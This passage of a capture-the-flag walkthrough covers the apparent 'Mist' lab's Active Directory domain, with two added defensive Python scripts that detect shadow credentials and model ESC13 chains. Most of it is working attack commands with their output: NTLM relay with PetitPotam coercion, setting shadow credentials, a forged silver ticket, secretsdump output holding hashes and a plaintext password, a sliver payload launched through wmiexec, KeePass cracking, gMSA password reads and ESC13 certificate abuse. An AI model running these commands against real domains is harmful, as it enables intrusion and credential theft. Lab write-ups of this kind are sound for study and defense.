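KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE, DEVICE_ID = 1, 2, 3, 4, 5, 6
CUSTOM_INFO, LAST_LOGON, CREATION_TIME = 7, 8, 9
BLOB_VERSION = 0x00000200
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(raw: bytes) -> datetime:
    """Little-endian FILETIME (100 ns ticks since 1601-01-01 UTC) to datetime."""
    (ticks,) = struct.unpack("<Q", raw)
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(dt: datetime) -> bytes:
    delta = dt - FILETIME_EPOCH  # integer arithmetic keeps the value exact
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    return struct.pack("<Q", ticks)


def parse_dn_binary(value: str) -> Tuple[bytes, str]:
    """Split an LDAP DN-Binary string 'B:<hexlen>:<hex>:<DN>' into (blob, DN)."""
    kind, hexlen, hexdata, dn = value.split(":", 3)
    if kind != "B" or int(hexlen) != len(hexdata):
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(hexdata), dn


def parse_key_credential(value: str) -> Dict[str, object]:
    """Return DeviceID, creation time, key usage and owning DN of one entry."""
    blob, dn = parse_dn_binary(value)
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != BLOB_VERSION:
        raise ValueError(f"unexpected blob version {version:#x}")
    entries: Dict[int, bytes] = {}
    offset = 4
    while offset + 3 <= len(blob):  # each entry: length (u16), identifier (u8), value
        length, ident = struct.unpack_from("<HB", blob, offset)
        offset += 3
        entries[ident] = blob[offset:offset + length]
        offset += length
    return {
        "dn": dn,
        "device_id": str(uuid.UUID(bytes_le=entries[DEVICE_ID])) if DEVICE_ID in entries else None,
        "created": filetime_to_datetime(entries[CREATION_TIME]) if CREATION_TIME in entries else None,
        "key_usage": entries[KEY_USAGE][0] if KEY_USAGE in entries else None,
    }


def build_sample(dn: str, device_id: uuid.UUID, created: datetime) -> str:
    """Construct a DN-Binary value for testing; key material is placeholder bytes."""
    def entry(ident: int, data: bytes) -> bytes:
        return struct.pack("<HB", len(data), ident) + data
    blob = struct.pack("<I", BLOB_VERSION)
    blob += entry(KEY_MATERIAL, b"\x00" * 32)  # placeholder, not a real public key
    blob += entry(KEY_USAGE, b"\x01")           # 0x01 = NGC
    blob += entry(KEY_SOURCE, b"\x00")          # 0x00 = AD
    blob += entry(DEVICE_ID, device_id.bytes_le)
    blob += entry(CREATION_TIME, datetime_to_filetime(created))
    hexdata = blob.hex().upper()
    return f"B:{len(hexdata)}:{hexdata}:{dn}"


def new_device_ids(baseline: Dict[str, Set[str]], current: List[str]) -> Dict[str, Set[str]]:
    """DeviceIDs present in freshly read values but absent from the baseline, per DN."""
    seen: Dict[str, Set[str]] = {}
    for value in current:
        parsed = parse_key_credential(value)
        seen.setdefault(str(parsed["dn"]), set()).add(str(parsed["device_id"]))
    return {dn: ids - baseline.get(dn, set()) for dn, ids in seen.items()
            if ids - baseline.get(dn, set())}


# Constructed samples: the DeviceID and timestamp from the listing above, plus a fake one.
SAMPLE_DN = "CN=MS01,CN=Computers,DC=mist,DC=htb"
SAMPLE_CREATED = datetime(2024, 10, 9, 14, 1, 2, tzinfo=timezone.utc)
SAMPLE_VALUE = build_sample(SAMPLE_DN, uuid.UUID("8cd97a3f-1874-4050-8154-cacac1a12514"), SAMPLE_CREATED)
SECOND_VALUE = build_sample(SAMPLE_DN, uuid.UUID("00000000-0000-0000-0000-00000000abcd"), SAMPLE_CREATED)

if __name__ == "__main__":
    print(parse_key_credential(SAMPLE_VALUE))
    print(new_device_ids({SAMPLE_DN: {"8cd97a3f-1874-4050-8154-cacac1a12514"}}, [SAMPLE_VALUE, SECOND_VALUE]))
```

Feeding this the attribute values read from each computer and user object on a schedule gives a cheap inventory; pairing it with directory-service object auditing (event 5136 on msDS-KeyCredentialLink) catches the write at the moment it happens rather than on the next sweep.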

I start with cloning the repository and create a new virtual environment to install the needed requirements and the library itself. Then I can start ntlmrelayx in interactive mode, listening on port 9999 for incoming requests and relaying them via ldaps.

git clone --single-branch \
          --branch interactive-ldap-shadow-creds \
          https://github.com/Tw1sm/impacket/
 
cd impacket
 
python3 -m venv venv && source venv/bin/activate
 
pip install -r requirements.txt
pip install PyOpenSSL==24.0.0 setuptools
pip install .
 
# Starting ntlmrelayx
proxychains -q python3 examples/ntlmrelayx.py -t ldaps://192.168.100.100 --http-port 9999 --interactive
Impacket v0.10.1.dev1+20220912.224808.5fcd5e81 - Copyright 2022 SecureAuth Corporation
 
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 9999
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
 
[*] Servers started, waiting for connections

Then I use the Python version of PetitPotam with the credentials of brandon.keywarp to coerce MS01$ into authenticating to itself on port 8080, which goes through the port forwarding to my listener.

proxychains python3 PetitPotam.py \
                    -target-ip 192.168.100.101 \
                    -dc-ip 192.168.100.100 \
                    --username Brandon.Keywarp \
                    -hashes :DB03D6A77A2205BC1D07082740626CC9 \
                    --domain MIST \
                    localhost@8080/asd \
                    192.168.100.101
 
                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
 
 
 
Trying pipe lsarpc
[-] Connecting to ncacn_np:192.168.100.101[\PIPE\lsarpc]
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.101:445  ...  OK
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

The script announces success and there’s a hit on ntlmrelayx indicating a new interactive session on port 11000. Connecting to this port via nc drops me into an LDAP shell where I can remove the previously set shadow credentials and set up new ones.

nc 127.0.0.1 11000
Type help for list of commands
 
# clear_shadow_creds ms01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108
 
Shadow credentials cleared successfully!
 
# set_shadow_creds ms01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108
 
KeyCredential generated with DeviceID: e9fe7459-d19d-0f81-2e27-de65b57d6c64
Shadow credentials successfully added!
Saved PFX (#PKCS12) certificate & key at path: c9cye1sx.pfx
Must be used with password: U381jXAD7tAyZbQou6AA

A new pfx is created in the directory where ntlmrelayx was started and a password is set for the file. With certipy-ad I first remove the password and then request a new TGT with the certificate to obtain the NTLM hash for MS01$.

certipy-ad cert -pfx c9cye1sx.pfx -password U381jXAD7tAyZbQou6AA -export -out ms01.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Writing PFX to 'ms01.pfx'
proxychains -q certipy-ad auth -pfx ms01.pfx -u MS01$ -domain mist.htb -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:173b11122b127a2aa3cc0887bfc18644

With the hash of the machine account and the SID of the domain I can craft a Silver Ticket for Administrator, get a shell and/or dump the credentials of the server. I’ll use ticketer from impacket to create the ticket; the domain SID comes from nxc first.

proxychains -q nxc ldap \
                   dc01.mist.htb \
                   -u brandon.keywarp \
                   -H 'DB03D6A77A2205BC1D07082740626CC9' \
                   --get-sid
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
LDAP        192.168.100.100 389    DC01             [+] mist.htb\brandon.keywarp:DB03D6A77A2205BC1D07082740626CC9 
LDAP        192.168.100.100 389    DC01             Domain SID S-1-5-21-1045809509-3006658589-2426055941
 
impacket-ticketer -domain-sid S-1-5-21-1045809509-3006658589-2426055941 \
                  -domain MIST \
                  -spn HOST/MS01.mist.htb \
                  -nthash 173b11122b127a2aa3cc0887bfc18644 \
                  -user-id 500 \
                  Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Through secretsdump I dump the hashes from MS01$ and run the sliver payload in the context of the admin user.

export KRB5CCNAME=Administrator.ccache
 
proxychains -q impacket-wmiexec \
               -no-pass \
               -k \
               -silentcommand \
               Administrator@ms01.mist.htb \
               "C:\\xampp\\htdocs\\m.exe"
 
proxychains -q impacket-secretsdump -no-pass -k Administrator@ms01.mist.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c4029c3c7681dd97b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:90f903787dd064cc1973c3aa4ca4a7c1:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39b46e16b48c8:::
[*] Dumping cached domain logon information (domain/username:hash)
MIST.HTB/Brandon.Keywarp:$DCC2$10240#Brandon.Keywarp#5f540c9ee8e4bfb80e3c732ff3e12b28: (2024-10-09 15:52:58)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MIST\MS01$:plain_password_hex:470c95fb11d5607f6420736b4fabc2f5a99022c3ed2ea0d20c364316b378b85b0efe1c23557742817e0f2091bd02a267b904e2829d029db0124ef07f6d71196bd3c76c44fdce75b257abd16cc8a9d67da6a8179c702e50f0843a5dfbd58956246a26dc02eb1a3e0b7d1ac963c9dbc0f7ec73340e7dd85e477c2a96f925ae09fbb4e209025f1b6bf97b50e7329a22ec04db9e92339dc557de641764884bd25d81b69eaba2f4f69f4328f3b39f2cae64185ca4eebf2d58d855f039d7c1e763b8f0e798b4bd452f7b355b621dc66c43334ba250ad712d10d484f8c99b2bf4fea0208197756a4d4fe4f1588c3d2c3b54c751
MIST\MS01$:aad3b435b51404eeaad3b435b51404ee:173b11122b127a2aa3cc0887bfc18644:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe464e18478cf4a7d809dfc9f5d6b5230ce98779b
dpapi_userkey:0x579d7a06798911d322fedc960313e93a71b43cc2
[*] NL$KM 
 0000   57 C8 F7 CD 24 F2 55 EB  19 1D 07 C2 15 84 21 B0   W...$.U.......!.
 0010   90 7C 79 3C D5 BE CF AC  EF 40 4F 8E 2A 76 3F 00   .|y<.....@O.*v?.
 0020   04 87 DF 47 CF D8 B7 AF  6D 5E EE 9F 16 5E 75 F3   ...G....m^...^u.
 0030   80 24 AA 24 B0 7D 3C 29  4F EA 4E 4A FB 26 4E 62   .$.$.}<)O.NJ.&Nb
NL$KM:57c8f7cd24f255eb191d07c2158421b0907c793cd5becfacef404f8e2a763f000487df47cfd8b7af6d5eee9f165e75f38024aa24b07d3c294fea4e4afb264e62
[*] _SC_ApacheHTTPServer 
svc_web:MostSavagePasswordEver123
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

On the desktop of the Administrator user I can find the first flag.

Shell as op_Sharon.Mullard (DC01)

Checking the other configured user on MS01, Sharon.Mullard, I quickly find a keepass file in her My Documents folder and two pictures in My Pictures. I’ll download all three files to my machine for further inspection.

sliver (mist) > ls 

C:\users\Sharon.Mullard\My Documents (4 items, 2.1 KiB)
=======================================================
Lrw-rw-rw-  My Music -> C:\Users\Sharon.Mullard\Music        0 B      Tue Feb 20 10:39:09 -0700 2024
Lrw-rw-rw-  My Pictures -> C:\Users\Sharon.Mullard\Pictures  0 B      Tue Feb 20 10:39:09 -0700 2024
Lrw-rw-rw-  My Videos -> C:\Users\Sharon.Mullard\Videos      0 B      Tue Feb 20 10:39:09 -0700 2024
-rw-rw-rw-  sharon.kdbx

sliver (mist) > ls

C:\users\Sharon.Mullard\My Documents\My Pictures (2 items, 1.2 MiB)
===================================================================
-rw-rw-rw-  cats.png            951.0 KiB  Wed Feb 21 08:41:24 -0700 2024
-rw-rw-rw-  image_20022024.png  254.4 KiB  Tue Feb 20 10:53:13 -0700 2024

Screenshot showing the webpage CyberChef with the first 14 characters of a 15-character password

The keepass database is password-protected, as expected, but luckily the file image_20022024.png reveals the first 14 of the 15 characters: UA7cpa[#1!_*ZX. This means I only have to brute-force a single character. I’ll extract the hash from the kdbx file with keepass2john and write the partial password to a file. Then I use hashcat to generate a wordlist by appending one character through a hybrid attack [4].

keepass2john sharon.kdbx > hash
 
hashcat -a6 password.txt '?a' --stdout > wordlist.txt
 
john --wordlist=wordlist.txt --fork=10 hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Node numbers 1-10 of 10 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
UA7cpa[#1!_*ZX@  (sharon)

john finds the cleartext password UA7cpa[#1!_*ZX@ quickly, since the wordlist consists of only 95 entries. This allows me to open the database and look for other saved credentials. All I can find is a single entry named operative account with the password ImTiredOfThisJob:(; it has no username, and the password does not work for Sharon.Mullard.

Keepass showing the password for the entry 'operative account'

Dumping all the users in the domain shows a likely candidate for the password, op_Sharon.Mullard, and trying the password for that account with nxc returns success.

sliver (mist) > execute -o cmd /c net user /domain

[*] Output:
The request will be processed at a domain controller for domain mist.htb.


User accounts for \\DC01.mist.htb

-------------------------------------------------------------------------------
Administrator            Brandon.Keywarp          Florence.Brown
Guest                    Harry.Beaucorn           Jonathan.Clinton
krbtgt                   Markus.Roheb             op_Markus.Roheb
op_Sharon.Mullard        Sharon.Mullard           Shivangi.Sumpta
svc_cabackup             svc_smb
The command completed successfully.

I’ll run SharpHound through sliver next to get an overview of the domain and check what I can do with the users and credentials found so far. After downloading the ZIP and ingesting it into BloodHound, it’s clear that the credentials allow me to connect to the Domain Controller via WinRM.

Shell as Administrator (DC01)

From the BloodHound graph I can see a ReadGMSAPassword edge from op_Sharon.Mullard to svc_ca$, and from there I can add Shadow Credentials to get access to svc_cabackup. This account has enrollment rights on the ManagerAuthentication template.

Bloodhound Graph showing the path from op_Sharon.Mullard to svc_cabackup

If the issuance policy attached to a certificate template carries an OID group link (msDS-OIDToGroupLink), a user who authenticates with a certificate enrolled from that template is granted the same access a member of the linked group would have. This is described in detail as ESC13⁵.

The current version of BloodHound (CE) does not show this edge yet, but there’s a PowerShell script I can use to quickly check for this misconfiguration.

Check-ADCSESC13.ps1
<#
Prints OIDs and certificate templates that may be used in an ADCS ESC13 abuse
 
The script will check for:
1. OIDs with non-default ownership
2. OIDs with non-default ACE
3. OIDs linked to a group
4. Certificate templates configured with OID linked to a group
#>
 
Import-Module ActiveDirectory
 
# Get OIDs and certificate templates with msPKI-Certificate-Policy
$ADRootDSE = Get-ADRootDSE
$ConfigurationNC = $ADRootDSE.configurationNamingContext
$OIDContainer = "CN=OID,CN=Public Key Services,CN=Services,$ConfigurationNC"
$TemplateContainer = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$ConfigurationNC"
$OIDs = Get-ADObject -Filter * -SearchBase $OIDContainer -Properties DisplayName,Name,msPKI-Cert-Template-OID,msDS-OIDToGroupLink,nTSecurityDescriptor
$Templates = Get-ADObject -Filter * -SearchBase $TemplateContainer -Properties msPKI-Certificate-Policy | ? {$_."msPKI-Certificate-Policy"} | select name,msPKI-Certificate-Policy
 
if ($OIDs) {
 
    Write-Host "Enumerating OIDs"
    Write-Host "------------------------"
 
    # Iterate through each OID
    foreach ($OID in $OIDs) {
 
        if ($OID."msDS-OIDToGroupLink") {
            Write-Host "OID $($OID.Name) links to group: $($OID."msDS-OIDToGroupLink")`r`n"
            Write-Host "OID DisplayName: $($OID."msPKI-Cert-Template-OID")"
            Write-Host "OID DistinguishedName: $($OID."DistinguishedName")"
            Write-Host "OID msPKI-Cert-Template-OID: $($OID."msPKI-Cert-Template-OID")"
            Write-Host "OID msDS-OIDToGroupLink: $($OID."msDS-OIDToGroupLink")"
            Write-Host "------------------------"
        }
 
        if ($OID.nTSecurityDescriptor.Owner -notlike "*\Enterprise Admins") {
            Write-Host "OID $($OID.Name) has non-default owner: $($OID.nTSecurityDescriptor.Owner)`r`n"
            Write-Host "OID DisplayName: $($OID."msPKI-Cert-Template-OID")"
            Write-Host "OID DistinguishedName: $($OID."DistinguishedName")"
            Write-Host "OID msPKI-Cert-Template-OID: $($OID."msPKI-Cert-Template-OID")"
            Write-Host "------------------------"        
        }
 
        $ACEs = $OID.nTSecurityDescriptor.Access
        foreach ($ACE in $ACEs) {
            if ($ACE.IdentityReference -like "*\Domain Admins" -or $ACE.IdentityReference -like "*\Enterprise Admins" -or $ACE.IdentityReference -like "*\SYSTEM") {
                continue
            } elseif ($ACE.IdentityReference -like "*\Authenticated Users" -and $ACE.ActiveDirectoryRights -eq "GenericRead") {
                continue
            } else {
                Write-Host "OID $($OID.Name) has non-default ACE:"
                Write-Output $ACE
                Write-Host "OID DisplayName: $($OID."msPKI-Cert-Template-OID")"
                Write-Host "OID DistinguishedName: $($OID."DistinguishedName")"
                Write-Host "OID msPKI-Cert-Template-OID: $($OID."msPKI-Cert-Template-OID")"
                Write-Host "------------------------"        
            }
        }
    }
 
    Write-Host "Enumerating certificate templates"
    Write-Host "------------------------"
 
    # Iterate through each template
    foreach ($Template in $Templates) {
 
        # Check if the Template OID matches any OID in the list
        $MatchingOID = $OIDs | ? { $_."msDS-OIDToGroupLink" -and $Template."msPKI-Certificate-Policy" -contains $_."msPKI-Cert-Template-OID" }
 
        if ($MatchingOID) {
            Write-Host "Certificate template $($Template.Name) may be used to obtain membership of $($MatchingOID."msDS-OIDToGroupLink")`r`n"
            Write-Host "Certificate template Name: $($Template.Name)"
            Write-Host "OID DisplayName: $($MatchingOID."msPKI-Cert-Template-OID")"
            Write-Host "OID DistinguishedName: $($MatchingOID."DistinguishedName")"
            Write-Host "OID msPKI-Cert-Template-OID: $($MatchingOID."msPKI-Cert-Template-OID")"
            Write-Host "OID msDS-OIDToGroupLink: $($MatchingOID."msDS-OIDToGroupLink")"
            Write-Host "------------------------"
        }
    }
    Write-Host "Done"
} else {
    Write-Host "Error: No OIDs were found."
}

After running this script from any of the sessions I have, it shows that enrollment with the ManagerAuthentication template grants membership of the Certificate Managers group. This group is a member of CA Backup, which can therefore enroll with the BackupSvcAuthentication template and act as a member of ServiceAccounts; that group in turn belongs to Backup Operators, which allows me to dump the credentials of the domain.

.\Check-ADCSESC13.ps1
Enumerating OIDs
------------------------
OID 14514029.01A0D91BA39F2716F6917FF97B18C130 links to group: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
 
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
OID 979197.E044723721C6681BECDB4DDD43B151CC links to group: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
 
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Enumerating certificate templates
------------------------
Certificate template ManagerAuthentication may be used to obtain membership of CN=Certificate Managers,CN=Users,DC=mist,DC=htb
 
Certificate template Name: ManagerAuthentication
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
Certificate template BackupSvcAuthentication may be used to obtain membership of CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
 
Certificate template Name: BackupSvcAuthentication
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Done
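The script above reports the direct OID-to-group links; what makes the finding exploitable is the chain they form with enrollment rights and group nesting. The following added example (mine, not the page's script or any BloodHound/Certipy code) models the same objects as plain dicts and follows that chain for a given principal until no further template becomes enrollable. The OIDs, DNs and template names mirror the script output above; the group nesting, the enrollment rights and the DN of the CA Backup group are assumptions taken from the text, and the extra policy OID without a group link is constructed to show a template that is not affected.

```python
"""ESC13 chain check over directory-style records (added example, constructed data)."""

BASE = "1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226"

# Policy OID objects as read from CN=OID,CN=Public Key Services,... (constructed).
OID_OBJECTS = [
    {"name": "14514029.01A0D91BA39F2716F6917FF97B18C130",
     "msPKI-Cert-Template-OID": f"{BASE}.6538420.14514029",
     "msDS-OIDToGroupLink": "CN=Certificate Managers,CN=Users,DC=mist,DC=htb"},
    {"name": "979197.E044723721C6681BECDB4DDD43B151CC",
     "msPKI-Cert-Template-OID": f"{BASE}.858803.979197",
     "msDS-OIDToGroupLink": "CN=ServiceAccounts,OU=Services,DC=mist,DC=htb"},
    # A policy OID without a group link (constructed) is not an ESC13 vector.
    {"name": "1.00000000000000000000000000000000",
     "msPKI-Cert-Template-OID": f"{BASE}.1.1", "msDS-OIDToGroupLink": None},
]

# Templates that have an issuance policy attached (constructed).
TEMPLATES = [
    {"name": "ManagerAuthentication", "msPKI-Certificate-Policy": [f"{BASE}.6538420.14514029"]},
    {"name": "BackupSvcAuthentication", "msPKI-Certificate-Policy": [f"{BASE}.858803.979197"]},
    {"name": "User", "msPKI-Certificate-Policy": [f"{BASE}.1.1"]},
]

# Group nesting (DN -> groups it is a member of); DNs of CA Backup are assumed.
MEMBER_OF = {
    "CN=Certificate Managers,CN=Users,DC=mist,DC=htb": ["CN=CA Backup,CN=Users,DC=mist,DC=htb"],
    "CN=ServiceAccounts,OU=Services,DC=mist,DC=htb": ["CN=Backup Operators,CN=Builtin,DC=mist,DC=htb"],
}

# Principals or groups allowed to enroll with each template (assumed from the text).
ENROLL_RIGHTS = {
    "ManagerAuthentication": {"CN=svc_cabackup,CN=Users,DC=mist,DC=htb"},
    "BackupSvcAuthentication": {"CN=CA Backup,CN=Users,DC=mist,DC=htb"},
    "User": {"CN=Domain Users,CN=Users,DC=mist,DC=htb"},
}

PRIVILEGED = {
    "CN=Backup Operators,CN=Builtin,DC=mist,DC=htb",
    "CN=Domain Admins,CN=Users,DC=mist,DC=htb",
    "CN=Enterprise Admins,CN=Users,DC=mist,DC=htb",
}


def closure(dn, member_of):
    """Return dn plus every group it belongs to, transitively."""
    seen, stack = set(), [dn]
    while stack:
        cur = stack.pop()
        if cur in seen:
            continue
        seen.add(cur)
        stack.extend(member_of.get(cur, []))
    return seen


def esc13_links(oids, templates):
    """Template name -> linked group DN, for templates whose policy OID has msDS-OIDToGroupLink."""
    link_by_oid = {o["msPKI-Cert-Template-OID"]: o["msDS-OIDToGroupLink"]
                   for o in oids if o.get("msDS-OIDToGroupLink")}
    return {t["name"]: link_by_oid[p]
            for t in templates
            for p in (t.get("msPKI-Certificate-Policy") or [])
            if p in link_by_oid}


def effective_groups(principal, member_of, links, enroll_rights):
    """Chain ESC13 enrollments until no new template is enrollable.

    Returns (groups the principal can act as, templates used in order)."""
    groups, used, progress = closure(principal, member_of), [], True
    while progress:
        progress = False
        for template, allowed in enroll_rights.items():
            if template in used or template not in links:
                continue
            if groups & allowed:  # the principal, or a group it holds, may enroll
                used.append(template)
                groups |= closure(links[template], member_of)
                progress = True
    return groups, used


def report(principal):
    """Print a one-line summary and return the privileged groups reachable by principal."""
    links = esc13_links(OID_OBJECTS, TEMPLATES)
    groups, used = effective_groups(principal, MEMBER_OF, links, ENROLL_RIGHTS)
    reached = sorted(groups & PRIVILEGED)
    print(f"{principal}: templates {used} -> privileged {reached or 'none'}")
    return reached


if __name__ == "__main__":
    report("CN=svc_cabackup,CN=Users,DC=mist,DC=htb")
    report("CN=Sharon.Mullard,CN=Users,DC=mist,DC=htb")
```

Fed with live data (the three LDAP queries the script runs, plus memberOf and the template ACLs), the same logic gives a remediation list: every template in `esc13_links` whose chain reaches a privileged group either needs the group link removed from the policy OID, the policy removed from the template, or its enrollment rights restricted to the intended principals.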

Now that the path forward is mapped, I start with the extraction of the NTLM hash for svc_ca$ via nxc and retrieve e218b0c599d694b2c722b23d5b1152d5.

proxychains -q nxc ldap \
                   dc01.mist.htb \
                   -u 'OP_SHARON.MULLARD' \
                   -p 'ImTiredOfThisJob:(' \
                   --gmsa
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
LDAPS       192.168.100.100 636    DC01             [+] mist.htb\OP_SHARON.MULLARD:ImTiredOfThisJob:( 
LDAPS       192.168.100.100 636    DC01             [*] Getting GMSA Passwords
LDAPS       192.168.100.100 636    DC01             Account: svc_ca$              NTLM: e218b0c599d694b2c722b23d5b1152d5

Instead of using ntlmrelayx (or the ldap shell) to set Shadow Credentials, I’ll use the previously shown pywhisker to add the credential link to svc_cabackup.

proxychains -q python3 pywhisker.py \
                       -u 'svc_ca$' \
                       -H :e218b0c599d694b2c722b23d5b1152d5 \
                       -d mist \
                       --dc-ip 192.168.100.100 \
                       --target \
                       'svc_cabackup' \
                       --action "add"
[*] Searching for the target account
[*] Target user found: CN=svc_cabackup,CN=Users,DC=mist,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f0bb0a14-4a4e-31c2-b82c-c9d7dae4fffd
[*] Updating the msDS-KeyCredentialLink attribute of svc_cabackup
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: 4pPS5jED.pfx
[*] Must be used with password: E3VwHXpUvLCEOUtUIC1K
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

With the help of certipy-ad I remove the password from the pfx, use it to authenticate and retrieve the NTLM hash for svc_cabackup: c9872f1bc10bdd522c12fc2ac9041b64.

certipy-ad cert \
           -pfx 4pPS5jED.pfx  \
           -password E3VwHXpUvLCEOUtUIC1K \
           -export \
           -out svc_cabackup.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Writing PFX to 'svc_cabackup.pfx'
 
proxychains -q certipy-ad auth \
                          -pfx svc_cabackup.pfx \
                          -u svc_cabackup \
                          -domain mist.htb \
                          -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[!] Could not find identification in the provided certificate
